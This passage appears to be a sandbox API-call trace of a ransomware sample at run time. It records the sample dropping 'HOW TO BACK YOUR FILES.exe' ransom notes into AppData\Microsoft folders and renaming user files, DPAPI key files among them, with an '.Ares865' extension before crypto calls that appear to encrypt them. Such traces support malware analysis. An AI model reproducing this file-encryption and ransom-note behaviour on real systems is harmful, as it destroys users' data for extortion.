Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.ares865"), dwFlags=0x1) returned 1 [0108.351] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.351] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=468) returned 1 [0108.399] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0490) returned 1 [0108.399] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.399] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.402] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0490) returned 1 [0108.403] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.403] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.404] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.Ares865") returned 128 [0108.404] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.ares865"), dwFlags=0x1) returned 1 [0108.406] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.406] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24) returned 1 [0108.407] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0490) returned 1 [0108.407] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.407] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.410] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0490) returned 1 [0108.411] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.411] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.411] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Proof", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Proof") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Proof" [0108.411] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f07c0 | out: hHeap=0x2b0000) returned 1 [0108.411] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0108.411] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Proof") returned 62 [0108.411] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Proof" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Proof") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Proof" [0108.411] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.411] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Proof\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\proof\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.412] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.412] GetLastError () returned 0x0 [0108.413] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\PowerPoint", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\PowerPoint") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\PowerPoint" [0108.413] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9be0 | out: hHeap=0x2b0000) returned 1 [0108.413] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0108.413] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\PowerPoint") returned 67 [0108.413] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\PowerPoint" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\PowerPoint") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\PowerPoint" [0108.413] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.413] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\PowerPoint\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\powerpoint\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.413] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.414] GetLastError () returned 0x0 [0108.414] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Outlook", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Outlook") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Outlook" [0108.414] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9c70 | out: hHeap=0x2b0000) returned 1 [0108.414] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0108.414] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Outlook") returned 64 [0108.414] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Outlook" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Outlook") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Outlook" [0108.414] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.414] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Outlook\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\outlook\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.415] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.415] GetLastError () returned 0x0 [0108.415] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Outlook\\Outlook.srs.Ares865") returned 84 [0108.415] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\outlook\\outlook.srs"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Outlook\\Outlook.srs.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\outlook\\outlook.srs.ares865"), dwFlags=0x1) returned 1 [0108.418] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Outlook\\Outlook.srs.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\outlook\\outlook.srs.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.418] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0108.419] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0408) returned 1 [0108.419] CryptGenRandom (in: hProv=0x2f0408, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.419] CryptReleaseContext (hProv=0x2f0408, dwFlags=0x0) returned 1 [0108.424] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0408) returned 1 [0108.425] CryptGenRandom (in: hProv=0x2f0408, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.425] CryptReleaseContext (hProv=0x2f0408, dwFlags=0x0) returned 1 [0108.425] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office" [0108.425] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f01e8 | out: hHeap=0x2b0000) returned 1 [0108.425] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0108.425] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office") returned 63 [0108.426] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office" [0108.426] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.426] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\office\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.426] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.427] GetLastError () returned 0x0 [0108.427] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\MSO1033.acl.Ares865") returned 83 [0108.427] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\office\\mso1033.acl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\MSO1033.acl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\office\\mso1033.acl.ares865"), dwFlags=0x1) returned 1 [0108.429] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\MSO1033.acl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\office\\mso1033.acl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.429] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=37762) returned 1 [0108.430] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f07c0) returned 1 [0108.430] CryptGenRandom (in: hProv=0x2f07c0, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.430] CryptReleaseContext (hProv=0x2f07c0, dwFlags=0x0) returned 1 [0108.434] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f07c0) returned 1 [0108.435] CryptGenRandom (in: hProv=0x2f07c0, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.435] CryptReleaseContext (hProv=0x2f07c0, dwFlags=0x0) returned 1 [0108.436] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent" [0108.436] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x321060 | out: hHeap=0x2b0000) returned 1 [0108.436] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0108.436] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent") returned 70 [0108.436] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent" [0108.436] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.436] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\office\\recent\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.437] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.437] GetLastError () returned 0x0 [0108.438] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent\\Global.LNK.Ares865") returned 89 [0108.438] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent\\Global.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\office\\recent\\global.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent\\Global.LNK.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\office\\recent\\global.lnk.ares865"), dwFlags=0x1) returned 1 [0108.440] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent\\Global.LNK.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\office\\recent\\global.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.441] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1434) returned 1 [0108.441] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f07c0) returned 1 [0108.442] CryptGenRandom (in: hProv=0x2f07c0, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.442] CryptReleaseContext (hProv=0x2f07c0, dwFlags=0x0) returned 1 [0108.445] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f07c0) returned 1 [0108.446] CryptGenRandom (in: hProv=0x2f07c0, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.446] CryptReleaseContext (hProv=0x2f07c0, dwFlags=0x0) returned 1 [0108.446] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent\\index.dat.Ares865") returned 88 [0108.446] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\office\\recent\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\office\\recent\\index.dat.ares865"), dwFlags=0x1) returned 1 [0108.455] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\office\\recent\\index.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.455] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=52) returned 1 [0108.455] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f07c0) returned 1 [0108.456] CryptGenRandom (in: hProv=0x2f07c0, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.456] CryptReleaseContext (hProv=0x2f07c0, dwFlags=0x0) returned 1 [0108.458] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f07c0) returned 1 [0108.459] CryptGenRandom (in: hProv=0x2f07c0, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.459] CryptReleaseContext (hProv=0x2f07c0, dwFlags=0x0) returned 1 [0108.459] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent\\Templates.LNK.Ares865") returned 92 [0108.459] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\office\\recent\\templates.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent\\Templates.LNK.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\office\\recent\\templates.lnk.ares865"), dwFlags=0x1) returned 1 [0108.461] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Office\\Recent\\Templates.LNK.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\office\\recent\\templates.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.461] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1138) returned 1 [0108.462] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f07c0) returned 1 [0108.462] CryptGenRandom (in: hProv=0x2f07c0, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.462] CryptReleaseContext (hProv=0x2f07c0, dwFlags=0x0) returned 1 [0108.464] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f07c0) returned 1 [0108.465] CryptGenRandom (in: hProv=0x2f07c0, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.465] CryptReleaseContext (hProv=0x2f07c0, dwFlags=0x0) returned 1 [0108.466] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network" [0108.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0108.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0108.466] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network") returned 64 [0108.466] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network" [0108.466] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.466] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\network\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.466] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.467] GetLastError () returned 0x0 [0108.467] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections" [0108.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfda8 | out: hHeap=0x2b0000) returned 1 [0108.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0108.467] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections") returned 76 [0108.467] lstrcatW (in: 